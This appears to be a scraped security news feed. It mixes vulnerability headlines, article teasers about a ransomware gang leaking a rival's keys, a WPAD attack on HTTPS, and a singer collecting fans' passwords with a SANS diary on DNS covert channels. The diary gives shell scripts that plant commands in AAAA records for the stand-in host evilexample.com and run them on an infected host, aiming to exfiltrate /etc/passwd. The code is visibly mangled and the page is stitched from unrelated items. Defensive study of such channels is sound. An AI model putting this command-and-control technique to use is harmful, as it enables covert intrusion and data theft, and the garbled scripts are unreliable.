Siemens SIMATIC NET PC-Software CVE-2016-5874 Remote Denial of Service Vulnerability
Siemens SINEMA Remote Connect Server CVE-2016-6204 Cross Site Scripting Vulnerability
SIMATIC WinCC CVE-2016-5744 Arbitrary File Read Vulnerability
Multiple Siemens Products Remote Code Execution Vulnerability
libarchive 'archive_write_set_format_iso9660.c' Integer Overflow Vulnerability
ImageMagick 'PNG' File Denial of Service Vulnerability
Little CMS CVE-2013-7455 Double Free Remote Code Execution Vulnerability
(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
IBM WebSphere Application Server Liberty Profile CVE-2016-2923 Information Disclosure Vulnerability
IBM WebSphere Application Server CVE-2016-0359 HTTP Response Splitting Vulnerability

Sometimes, the fierce competition in the booming crypto ransomware market works in the favor of the victims whose priceless data is held hostage. That appears to be what played out on Tuesday when the criminals behind a package known as "Mischa" published what's purported to be the secret crypto keys for the rival Chimera malware.

"Earlier this year we got access to big parts of their deveolpment [sic] system, and included parts of Chimera in our project," the Mischa developers wrote in a message posted to Pastebin. "Additionally we now release about 3500 decryption keys from Chimera."

Translation: As if breaking in to the Chimera developers' network and stealing their code wasn't enough of an affront, the competing Mischa gang now claims to have leaked the keys that defang Chimera.

Read 4 remaining paragraphs | Comments

Cross-Site Scripting vulnerability in ColorWay WordPress Theme
Silurus Classifieds XSS Vulnerability
PCRE 'find_fixedlength()' Function Heap Buffer Overflow Vulnerability
PCRE 'match()' Function Stack Buffer Overflow Vulnerability
PCRE CVE-2016-3191 Buffer Overflow Vulnerability
PCRE Regular CVE-2015-8385 Pattern Handling Buffer Overflow Vulnerability

(credit: Ddxc)

A key guarantee provided by HTTPS encryption is that the addresses of visited websites aren't visible to attackers who may be monitoring an end user's network traffic. Now, researchers have devised an attack that breaks this protection.

The attack can be carried out by operators of just about any type of network, including public Wi-Fi networks, which arguably are the places where Web surfers need HTTPS the most. It works by abusing a feature known as WPAD—short for Web Proxy Autodisovery—in a way that exposes certain browser requests to attacker-controlled code. The attacker then gets to see the entire URL of every site the target visits. The exploit works against virtually all browsers and operating systems. It will be demonstrated for the first time at next week's Black Hat security conference in Las Vegas in a talk titled Crippling HTTPS with Unholy PAC.

"People rely on HTTPS to secure their communication even when the LAN/Wi-Fi cannot be trusted (think public Wi-Fi/hotels/cafes/airports/restaurants, or compromised LAN in an organization)," Itzik Kotler, cofounder and CTO of security firm SafeBreach and one of the scheduled speakers, wrote in an e-mail. "We show that HTTPS cannot provide security when WPAD is enabled. Therefore, a lot of people are actually exposed to this attack when they engage in browsing via non-trusted networks."

Read 8 remaining paragraphs | Comments

Juniper Junos CVE-2016-1276 Multiple Denial of Service Vulnerabilities
Dropbox 6.4.14 DLL Hijacking Vulnerability
Huawei ISM Professional XSS Vulnerability
Crashing Browsers Remotely via Insecure Search Suggestions

Dataexfiltrationand command and control channels via DNS are nothing new exactly. In many ways, DNS is an ideal covert channel. Even well-protected systems usually can connect to a recursive name server that will forward queries to any authoritative name server. The bucket chain of DNS servers will bypass whatever firewall is used to protect the system. Intrusion detection systems have implemented signatures for abnormally large queries, but often valid domain names are rather long, in particular, if they are associated with public clouds or content delivery networks.DNSSECrecords also tend to trigger some of these signatures.

Traditionally, an infected system willexfiltratedata using A records, and then request new commands to be executed using TXT records. While A records work great toexfiltratedata, TXT records are more problematic as they are less commonly used and tend to stick out more.

Note that we are not interested in implementing a complete IP over DNS tunnel here like dnscat2 or iodine. We try to be stealthy on the network by using as few and as normal DNS queries as possible, and we are trying to be covert on the system by using common command line tools instead of installing additional software that may trigger anti-malware systems.

There are a couple of methods that can be used to return more meaningful data than anIPv4address in a DNS A query response:

  • Additional information: sort of anything goes here, but the recursive DNS server doesnt necessarily pass the information along
  • The response includes a copy of the query. One could modify the query part of the response (after all, we dont expect the response to be used in the traditional sense).

But to do either, we need a custom DNS server. I was trying to find a way to pass data back to the infected system without having to code up a new DNS server (ok, there isScapy-) ... maybe that will be a second diary).

AAAA records, on the other hand, return four times as much data as A records, and by returning multiple AAAA records, we can encode reasonably complex commands. We could do the same with A records, but doing so with AAAA records turns out to be a lot simpler.

First, we need to encode a set of commands in AAAA records. To do this, we convert the content of the file we are trying to encode into hex, and then use the dynamic DNS utility nsupdate to add the respective records to our zone (I am using here):!/bin/shn=2000echo server localhostecho zone evilexample.comecho prereq yxrrset AAAAecho update delete a.evilexample.comecho sendfor b in `xxd -p -c 14 $1 | sed s/..../:/g | sed s/:$// do f=$n:$b f=`echo $f | sed s/:..$/00/` f=`echo $f:0000:0000:0000:0000:0000:0000:0000:0000 | head -c39` echo update 10 AAAA $fdoneecho send

Lets incode the following string (in sample.txt done

This command, once executed on the receiving end, willexfiltratethe content of /etc/passwd

Next, we use to create the necessaryAAAArecords. nsupdate will pass the commands to the authoritative name server. the dns.key is the update key for the zone you are using (if you configured one).

./ sample.txt | nsupdate -k dns.key

Once this completes, you should see the followingAAAArecords:

$ dig +short AAAA a.evilexample.com2003:7274:2024:622e:6576:696c:6578:616d2004:706c:652e:636f:6d3b:2064:6f6e:650a2000:666f:7220:6220:696e:2060:7878:64202001:2d70:202f:6574:632f:7061:7373:77642002:603b:2064:6f20:6469:6720:2b73:686f

Note how the first two bytes are used as a serial number as the order in which the records are returned may change.

On the receiving end (infected system), we can now extract the data with a simple shell script:

dig +short AAAA | sort -n  | cut -f2- -d: | tr -d : | xxd -p -c 14 -r

To execute the script above, just enclose it in backticks, add it to a cron job or whatever, and you got a command and control channel over IPv6. Best part: All you need on the infected host is a shell script.

You can find the script above on github:

Why use bash vs. perl/python? Because it works!

How do we detect these covert channels?

The best method is likely to monitor the volume of DNS queries from particular hosts. Mail servers tend to sent a lot of DNS queries. But other, normal servers, will only send few. You could implement rate limiting on the recursive web server to disrupt the covert channel, or just monitor your query logs or traffic logs to detect abnormal volumes of DNS traffic from particular hosts.

Further Reading:


Johannes B.Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Jack Johnson (right), is one of the singers in the pop-rap duo "Jack & Jack." (credit: genesiating)

As a new way to connect with his fans, Jack Johnson—one half of the pop-rap duo Jack & Jack, not to be confused with the laid back Hawaiian singer-songwriter of the same name—has spent the last month soliciting social media passwords.

Using the hashtag #HackedByJohnson, the performer has tweeted at his fans to send him their passwords. (Why he didn’t go for the shorter and catchier #JackHack, we’ll never know.) Then, Johnson posts under his fans’ Twitter accounts, leaving a short personalized message, as them.

Here's one example:

Read 12 remaining paragraphs | Comments

GNU glibc CVE-2015-8777 Local Security Bypass Vulnerability
GNU glibc 'misc/hsearch_r.c' Integer Overflow Vulnerability
Internet Storm Center Infocon Status